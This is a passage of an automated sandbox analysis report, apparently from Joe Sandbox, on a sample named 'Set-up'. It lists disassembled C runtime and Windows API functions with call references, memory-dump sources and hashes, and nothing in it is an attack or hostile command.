                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_invalid_parameter_noinfo
                                                                                              • String ID:
                                                                                              • API String ID: 2959964966-0
                                                                                              • Opcode ID: c3d6eaa9eee9f134ec7c17922ac70990d059539d88e92a874fd5c09d6225e68c
                                                                                              • Instruction ID: 37d4c703fb89b843ca5da3d5164dc8a7b8051d8dd1d8c7a8ab74cc2aecf08b97
                                                                                              • Opcode Fuzzy Hash: c3d6eaa9eee9f134ec7c17922ac70990d059539d88e92a874fd5c09d6225e68c
                                                                                              • Instruction Fuzzy Hash: 3121E076A54AE68BDF048F29C8506BA33B0FF42BD4B1040D9E8919B380F73D8D41C7A0
                                                                                              Function 6BB696F6 Relevance: 6.1, APIs: 4, Instructions: 85COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _towlower_l.MSVCR100(?,?,?), ref: 6BB6973E
                                                                                                • Part of subcall function 6BB62939: iswctype.MSVCR100(?,00000001,?,?,?,?,?,?,?), ref: 6BB6297D
                                                                                              • _towlower_l.MSVCR100(?,?,?,?,?), ref: 6BB6974E
                                                                                              • _errno.MSVCR100 ref: 6BB8C6CA
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB8C6D5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _towlower_l$_errno_invalid_parameter_noinfoiswctype
                                                                                              • String ID:
                                                                                              • API String ID: 2204055994-0
                                                                                              • Opcode ID: ba0f12c23ae9cc6553eda531eafe76f1f3573c430cfd055574d5848509f427d6
                                                                                              • Instruction ID: fa4294559ec3350fc989c73e18fa9a33138aa779705fbb29f9390d890aa73b0e
                                                                                              • Opcode Fuzzy Hash: ba0f12c23ae9cc6553eda531eafe76f1f3573c430cfd055574d5848509f427d6
                                                                                              • Instruction Fuzzy Hash: 5C21D8B65002D997DB248FA5CD816BE37A8FF44A95B9005B6E8A0DB181F73CCD40D770
                                                                                              Function 6BB9A7E0 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 6BB9A9A9: _fabs.LIBCMT(00000000,00000000,00000000,00000000,?,6BB9A8D7,00000000,00000000,?,6BB9A6BD), ref: 6BB9A9E1
                                                                                              • sqrt.MSVCR100(?,?,?,?,?), ref: 6BB9A85F
                                                                                              • _fabs.LIBCMT(?,?,?,?,?), ref: 6BB9A86D
                                                                                                • Part of subcall function 6BBE1157: __ctrlfp.LIBCMT ref: 6BBE1170
                                                                                                • Part of subcall function 6BBE1157: __except1.LIBCMT ref: 6BBE11BC
                                                                                              • _fabs.LIBCMT(?,?,?,?,?), ref: 6BB9A88E
                                                                                              • exp.MSVCR100(?,?,?,?,?), ref: 6BB9A89C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _fabs$__ctrlfp__except1sqrt
                                                                                              • String ID:
                                                                                              • API String ID: 2723176039-0
                                                                                              • Opcode ID: e6f17ea1165961a31aba1eb9d5b3ac2a4ffeb04eb119bdcd3f198de9b81fe039
                                                                                              • Instruction ID: 7878c85592038db9e6a06b149c8e2cb5b9c40ca71497571111abe24188fb5bb2
                                                                                              • Opcode Fuzzy Hash: e6f17ea1165961a31aba1eb9d5b3ac2a4ffeb04eb119bdcd3f198de9b81fe039
                                                                                              • Instruction Fuzzy Hash: 4A21F672E00608E7CB047FB9E4855EDFFB4FF45354F2284A5E49462280DF3999308B95
                                                                                              Function 6BB75FCE Relevance: 6.1, APIs: 4, Instructions: 76COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcspbrk.LIBCMT(?,6BB76018,?,00000000,6BB76602,?,?,?,?,?,?,6BB759BB), ref: 6BB75FF5
                                                                                              • _calloc_crt.MSVCR100(00000004,00000001,?,00000000,6BB76602,?,?,?,?,?,?,6BB759BB), ref: 6BB7603C
                                                                                              • free.MSVCR100(00000000,?,00000000,6BB76602,?,?,?,?,?,?,6BB759BB), ref: 6BB76078
                                                                                              • _wmatch.LIBCMT ref: 6BB87738
                                                                                                • Part of subcall function 6BB75F95: _malloc_crt.MSVCR100(00000008,?,6BBACE77,?,00000000,-00000002,6BC04BD8), ref: 6BB75F9C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _calloc_crt_malloc_crt_wcspbrk_wmatchfree
                                                                                              • String ID:
                                                                                              • API String ID: 588445202-0
                                                                                              • Opcode ID: 69f42b9c9fff4c34f5db9b7c5d29de255e0991300610e1793e1741da524740c2
                                                                                              • Instruction ID: e1aa35a0646271aa4b88e96bf313179275d4ae0b6b90805c088af0bb034c40f8
                                                                                              • Opcode Fuzzy Hash: 69f42b9c9fff4c34f5db9b7c5d29de255e0991300610e1793e1741da524740c2
                                                                                              • Instruction Fuzzy Hash: EE21C376904A90CFD732EF2DD980909B7F4EF85B20322016ED576DB250F63BD9418B80
                                                                                              Function 6BB97D24 Relevance: 6.1, APIs: 4, Instructions: 76timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(?,000000FF), ref: 6BB97D63
                                                                                              • GetLastError.KERNEL32 ref: 6BB97D70
                                                                                              • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(?,000000FF), ref: 6BB97D82
                                                                                                • Part of subcall function 6BB97406: CreateTimerQueue.KERNEL32(ECA782CA,?,00000000,ECA782CA,?,00000000,ECA782CA,00000000,6BB95CBE,6BB95C86), ref: 6BB9742E
                                                                                                • Part of subcall function 6BB97406: std::exception::exception.LIBCMT(6BB95C86,00000001,ECA782CA,?,00000000,ECA782CA), ref: 6BB97487
                                                                                                • Part of subcall function 6BB97406: _CxxThrowException.MSVCR100(ECA782CA,6BB6BDD8,6BB95C86,00000001,ECA782CA,?,00000000,ECA782CA), ref: 6BB9749C
                                                                                              • DeleteTimerQueueTimer.KERNEL32(00000000,?,000000FF), ref: 6BB97D88
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Timer$Concurrency@@QueueQueue@details@Shared$CreateDeleteErrorExceptionLastThrowstd::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 3155262267-0
                                                                                              • Opcode ID: 105b27225dff2c26e7aa52334b638a3a07fe829bd845a4e031f3466f410a0ffc
                                                                                              • Instruction ID: ea38312c92642019971dec33cfd1cfbbdc7ff573f64ba40990b9f8d10e8ce6e1
                                                                                              • Opcode Fuzzy Hash: 105b27225dff2c26e7aa52334b638a3a07fe829bd845a4e031f3466f410a0ffc
                                                                                              • Instruction Fuzzy Hash: 922198715012549FD711AF2ADC84D2673F5EF83B21B1586B9E469CB690CB78EC01CB61
                                                                                              Function 6BBA0B09 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • TlsSetValue.KERNEL32(?,?,00000000,?,?,?,6BBA0A36,00000000,00000001,?,?,6BBA0A58), ref: 6BBA0B2B
                                                                                              • QueryDepthSList.KERNEL32(?,?,00000000,?,?,?,6BBA0A36,00000000,00000001,?,?,6BBA0A58), ref: 6BBA0B3F
                                                                                              • CloseHandle.KERNEL32(?,?,?,?,6BBA0A36,00000000,00000001,?,?,6BBA0A58), ref: 6BBA0B61
                                                                                              • InterlockedPushEntrySList.KERNEL32(?,-00000004,?,?,?,6BBA0A36,00000000,00000001,?,?,6BBA0A58), ref: 6BBA0B79
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: List$CloseDepthEntryHandleInterlockedPushQueryValue
                                                                                              • String ID:
                                                                                              • API String ID: 94243546-0
                                                                                              • Opcode ID: 05fc122ff362cceefa17b4da73fbdebae148a5f2303429157441c96db7bb2b2c
                                                                                              • Instruction ID: 250f7f20e7f02619ab1da826ca26dc649d22b39e5836a031b6d091c87f07532e
                                                                                              • Opcode Fuzzy Hash: 05fc122ff362cceefa17b4da73fbdebae148a5f2303429157441c96db7bb2b2c
                                                                                              • Instruction Fuzzy Hash: 352129329042509FDB109F20C589F9E77F8EF45725F440469E84A8B190DB39E944CBA0
                                                                                              Function 6BB6CD87 Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _lock_file.MSVCR100(?,6BB6CE28,00000014), ref: 6BB6CDD4
                                                                                                • Part of subcall function 6BB6A557: _lock.MSVCR100(?,?,?,6BBB6EA0,00000040,6BBB6ED8,0000000C,6BB88676,00000000,?), ref: 6BB6A584
                                                                                              • _fgetwc_nolock.MSVCR100(?,?,?,6BB6CE28,00000014), ref: 6BB6CDE9
                                                                                              • _errno.MSVCR100(6BB6CE28,00000014), ref: 6BB72E04
                                                                                              • _invalid_parameter_noinfo.MSVCR100(6BB6CE28,00000014), ref: 6BB886B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_fgetwc_nolock_invalid_parameter_noinfo_lock_lock_file
                                                                                              • String ID:
                                                                                              • API String ID: 3916178533-0
                                                                                              • Opcode ID: 0df1b7183eeec3ae5262a6c89799cb4aaae7daef2d5710cc2189641de4487b0a
                                                                                              • Instruction ID: cfff5480773cb3e4acbaf1d80ac88cfa06552795b9f4d007accfc3863c38e7f8
                                                                                              • Opcode Fuzzy Hash: 0df1b7183eeec3ae5262a6c89799cb4aaae7daef2d5710cc2189641de4487b0a
                                                                                              • Instruction Fuzzy Hash: 77116D719002CADFDF249FB8C8811AD77B0EF493A4B20887ED56497180E73C9D919B90
                                                                                              Function 6BB990E6 Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • std::exception::exception.LIBCMT(?), ref: 6BB99107
                                                                                                • Part of subcall function 6BBD3502: std::exception::_Copy_str.LIBCMT(6BBA2171,?,?,6BBA2171,6BBA1FE2,?,6BBA1FE2,00000001), ref: 6BBD351D
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFE98), ref: 6BB9911C
                                                                                              • Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB9913A
                                                                                              • SetEvent.KERNEL32(?), ref: 6BB99185
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency::unsupported_os::unsupported_osCopy_strEventExceptionThrowstd::exception::_std::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 1689211050-0
                                                                                              • Opcode ID: c8521e40dc9d8b0aa76c5eb549d659a58c76eee5f43daaf35a491c744fdc13f6
                                                                                              • Instruction ID: ea2f9409dccc475ea42c08447631af20f06947bbe92fe2b9e40041b2e6024109
                                                                                              • Opcode Fuzzy Hash: c8521e40dc9d8b0aa76c5eb549d659a58c76eee5f43daaf35a491c744fdc13f6
                                                                                              • Instruction Fuzzy Hash: BE11B132900258AFCF44EF64D88598D7BB8FF46354B1080B5EC56DB202DB38DA45CBD0
                                                                                              Function 6BB9933A Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • std::exception::exception.LIBCMT(?), ref: 6BB9935C
                                                                                                • Part of subcall function 6BBD3502: std::exception::_Copy_str.LIBCMT(6BBA2171,?,?,6BBA2171,6BBA1FE2,?,6BBA1FE2,00000001), ref: 6BBD351D
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFE78,?), ref: 6BB99371
                                                                                                • Part of subcall function 6BB777D4: RaiseException.KERNEL32(?,?,6BB8F317,?,?,?,?,?,6BB8F317,?,6BB6BDD8,6BC07580), ref: 6BB77813
                                                                                              • SignalObjectAndWait.KERNEL32(?,?,000000FF,00000001), ref: 6BB993BA
                                                                                              • SetEvent.KERNEL32(?), ref: 6BB993C9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Exception$Copy_strEventObjectRaiseSignalThrowWaitstd::exception::_std::exception::exception
                                                                                              • String ID:
                                                                                              • API String ID: 1437111950-0
                                                                                              • Opcode ID: 8ca885d8c4f0605e6b49b3a0959637df5792ebec2c3ca92c5f0c85c994f7685c
                                                                                              • Instruction ID: 81184f04be2783bbe423e37fa7b2aaede2fdb7b5f3a631e8cb0df269ee5e4997
                                                                                              • Opcode Fuzzy Hash: 8ca885d8c4f0605e6b49b3a0959637df5792ebec2c3ca92c5f0c85c994f7685c
                                                                                              • Instruction Fuzzy Hash: 99110436100705AFCB11EF75D884E8EBBB5FF8A364B008678E866C7291DB34E904CB90
                                                                                              Function 6BB6FCB3 Relevance: 6.1, APIs: 4, Instructions: 56COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT(00000000,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB6FCD5
                                                                                              • _wcslen.LIBCMT(00000000,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB6FCE8
                                                                                              • _wcsnicoll.MSVCR100(00000000,00000000,00000000,?,00000000,?,6BB6FD74,?,6BB6FD98,0000000C), ref: 6BB6FD05
                                                                                              • ___mbtow_environ.LIBCMT ref: 6BB9086D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$___mbtow_environ_wcsnicoll
                                                                                              • String ID:
                                                                                              • API String ID: 3727037093-0
                                                                                              • Opcode ID: 435875a49ebe8552dd8d8487f57d992435e2a869b9132abef6ae43f6ea93c1d0
                                                                                              • Instruction ID: 56933e4e72d68a7cf71055915e55ad537a54cf62848cd9b51365aade185d301f
                                                                                              • Opcode Fuzzy Hash: 435875a49ebe8552dd8d8487f57d992435e2a869b9132abef6ae43f6ea93c1d0
                                                                                              • Instruction Fuzzy Hash: 4401A132A046E1ABDB216A69D840A0A33F8DF85BD8B15407ADC68D7100F73DDD8187A0
                                                                                              Function 6BB723EC Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _fileno.MSVCR100(?,?,00000001), ref: 6BB72431
                                                                                              • _lseek.MSVCR100(00000000,?,00000001), ref: 6BB72438
                                                                                              • _errno.MSVCR100 ref: 6BB88D1F
                                                                                              • _ftell_nolock.MSVCR100(?), ref: 6BB88D33
                                                                                                • Part of subcall function 6BB6A665: _fileno.MSVCR100(?,?,?,?,?,?,?,6BB6A900,?), ref: 6BB6A694
                                                                                                • Part of subcall function 6BB6A665: _write.MSVCR100(00000000,?,?,?,?,?,?,6BB6A900,?), ref: 6BB6A69B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _fileno$_errno_ftell_nolock_lseek_write
                                                                                              • String ID:
                                                                                              • API String ID: 2052885585-0
                                                                                              • Opcode ID: e23e1c0d1d23114a4bbc024b3759f70314cc6b3292a722d7c69b4346edb33bb2
                                                                                              • Instruction ID: 94e7c5ab726e615f8eace8b58527b25f5f437bf6a35ab8a5ae8a452a23db4c50
                                                                                              • Opcode Fuzzy Hash: e23e1c0d1d23114a4bbc024b3759f70314cc6b3292a722d7c69b4346edb33bb2
                                                                                              • Instruction Fuzzy Hash: 9001C4324007A59FDB219E35C801B8E77A4EF03778F248629EA74561D0E73DD6018B51
                                                                                              Function 6BBA0393 Relevance: 6.1, APIs: 4, Instructions: 52COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BBA039A
                                                                                                • Part of subcall function 6BB9B4E1: ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100 ref: 6BB9B503
                                                                                              • ??0SchedulerPolicy@Concurrency@@QAA@IZZ.MSVCR100(?,00000000,6BC04628,0000000C,6BBA0342,?,?,?,6BB9617E,?,6BBA558F,00000000,6BBA5EC0,?,?,?), ref: 6BBA03DD
                                                                                              • memcpy.MSVCR100(?,?,00000024,6BC04628,0000000C,6BBA0342,?,?,?,6BB9617E,?,6BBA558F,00000000,6BBA5EC0,?,?), ref: 6BBA03F8
                                                                                              • ??3@YAXPAX@Z.MSVCR100(?,?,6BB9617E,?,6BBA558F,00000000,6BBA5EC0,?,?,?,00000000,?,?,?,6BBA5DCC,00000001), ref: 6BBA0422
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@Spin$??3@H_prolog3Once@?$_Policy@SchedulerWait@$00@details@memcpy
                                                                                              • String ID:
                                                                                              • API String ID: 3595554022-0
                                                                                              • Opcode ID: c853394652bf4b0de673db48fb922438cce2fcff5a275c023d78695ebb8e68ab
                                                                                              • Instruction ID: e69ab869d67b227ecb36a098f09f75fa811a2be91ab32a93bfdfa6a05855fc81
                                                                                              • Opcode Fuzzy Hash: c853394652bf4b0de673db48fb922438cce2fcff5a275c023d78695ebb8e68ab
                                                                                              • Instruction Fuzzy Hash: 60115E31A092909BDF04DF64CC81BAD77F4EF09318F5504ADF510EB690EB7ADA449B54
                                                                                              Function 6BB72214 Relevance: 6.1, APIs: 4, Instructions: 52COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _strlen.LIBCMT(00000000), ref: 6BB72232
                                                                                              • _strlen.LIBCMT(00000000), ref: 6BB72241
                                                                                              • __fassign.LIBCMT(00000000,00000000,00000000), ref: 6BB7225D
                                                                                              • ___wtomb_environ.LIBCMT ref: 6BB90817
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strlen$___wtomb_environ__fassign
                                                                                              • String ID:
                                                                                              • API String ID: 1283471604-0
                                                                                              • Opcode ID: 0a4a78f2a37b9a10147578de94aaa48032a7a6242d4daf9ccd7965fa4b24661c
                                                                                              • Instruction ID: 4c9c125bd0b0f1b2f827d9a47b491f42585d52cf9c6b65400359264e7fdfdd32
                                                                                              • Opcode Fuzzy Hash: 0a4a78f2a37b9a10147578de94aaa48032a7a6242d4daf9ccd7965fa4b24661c
                                                                                              • Instruction Fuzzy Hash: F401B173E08DD0A7DB31AA69D940A4937E8EB87B94B1544BAE838A7500D739D9408791
                                                                                              Function 6BB62B2A Relevance: 6.1, APIs: 4, Instructions: 51COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno_memset_msizerealloc
                                                                                              • String ID:
                                                                                              • API String ID: 1728161066-0
                                                                                              • Opcode ID: 5429b36844b1c51c28563ff91aa890585944cbb2be13d04acb69f0e001fb0dba
                                                                                              • Instruction ID: 7af7af081d46c25b171ed3309b8b7e8e562ea7ebc799ab41afb1c9bdd5bf46d3
                                                                                              • Opcode Fuzzy Hash: 5429b36844b1c51c28563ff91aa890585944cbb2be13d04acb69f0e001fb0dba
                                                                                              • Instruction Fuzzy Hash: 12F0F4376042966FEB144D75ECC5D9F7B5AEBC42B4B18453EF90886240FA78CC4085A0
                                                                                              Function 6BB67F02 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _calloc_crt.MSVCR100(00000001,00000164), ref: 6BB67F23
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 6BB75B3B
                                                                                              • ___free_lc_time.LIBCMT ref: 6BB91681
                                                                                              • free.MSVCR100(00000000,00000000), ref: 6BB91687
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
